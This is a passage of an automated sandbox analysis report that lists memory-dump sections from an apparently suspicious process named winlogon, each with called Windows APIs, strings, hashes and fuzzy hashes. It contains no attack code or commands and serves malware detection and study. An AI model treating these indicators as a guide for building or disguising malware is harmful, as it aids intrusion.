                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction ID: 72ca8a3ca2c797191b1185e72d0950ed6f6b3868902fa79715834b3bdb5aef3e
                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction Fuzzy Hash: 18018B32A40B94CAE715DF62A80459977A0FB88F84F868025EB4943718DE39E052C386
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2228DF), ref: 000001CA7D222A12
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction ID: 68b43c0824a30f871ee081a9c83458cb90aaee78de66b724d65557e9164a7766
                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction Fuzzy Hash: 0791E033A5075899FB628F659850BED3BA0BF54B8CF854106EE0A57A94CA37D047C3CB
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction ID: e1da5454589ae589727566414135aba046387261922def3505f63e54200d3d87
                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction Fuzzy Hash: A8115736B50F088AFB00CF60E8547A833A4FB58758F840E21EA2D867A8DF78D15583C2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction ID: 8d43051fae0432339c287c2151160f3a64fceb99f59810b575694d931f32b1a0
                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction Fuzzy Hash: 5371F733A8474591FB369E2A9841BEA7794FF44788F90801AED0953B84DE37C606C7C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm
                          • API String ID: 3242871069-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: fd78e535435ffec6a742ccc5ca62527ce80d22f415176f15bbae23ba0b9d84d4
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: 6C518133B52B088AFB55DF15D444FA83391FB44F9CF954129AA4D47B88D77AC841C782
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: b460edc10a65c72ae55a20d42f54f48aa37f6c81a21e5efe8d7f1e1a140c3131
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: 9161A333908BC882E7729F15E440BDAB7A0FB85B98F444215EB9C47B99CB79D191CB42
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction ID: 1df65754e96209d10ce77b496f8102a845f38ec8baad36118dacfef27c9bbe4a
                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction Fuzzy Hash: B8511537A84389C1FA268E25A455BEB7751FF84788F948229ED4903B89DA37C403C7C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction ID: 543a74f7f096710a94370db433aa404daddb7db03a989235164fc2747e9da801
                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction Fuzzy Hash: 9C513837E8479841F626CE25A464BEA7791FBA8B89FD40069DD4943B89DE37C500C7C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction ID: d46591c1412a96a10cecd863ef609a76f42ec2867853ab4bfb7008d3bc80fece
                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction Fuzzy Hash: 7341C633A1578886F7218F25E444BDAB7A4FB58788F854121FA4D87754EB3AD402C7C6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction ID: 517ae6d43ddc074c8658f2a788c9059df09fd0698180bc9205b6b9a099bd701b
                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction Fuzzy Hash: 34116033614B4482EB228F15F40469977E5FB88B98FA88224EE8D07754DF3EC552CB81
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction ID: 94fdc9e09a08f213f1bc6ccc5a98238e785e2224b4f0dd50957134c3d91f74e5
                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction Fuzzy Hash: A011A132F01B8881FA16CB66A40959977A0FBC9FD4F998128DE4E53724DF3AD4438386
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction ID: 839ec4f0ffbd96bf49ac46d9521be995a92d04ba0fb748254b619ef769a1f32e
                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction Fuzzy Hash: 0CE03932A416089AF7158B62D80979936E1FB88B19FC6C024C90907350EF7ED49A87C2
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction ID: 4bb58136d852c2a653d8a036cd639210b1baa135ea19a913abf8e9fecaf76bee
                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction Fuzzy Hash: BCE06D72A516089AF7198B22D80969832A1FF88B19FC5C020C90907310EE3D949A9692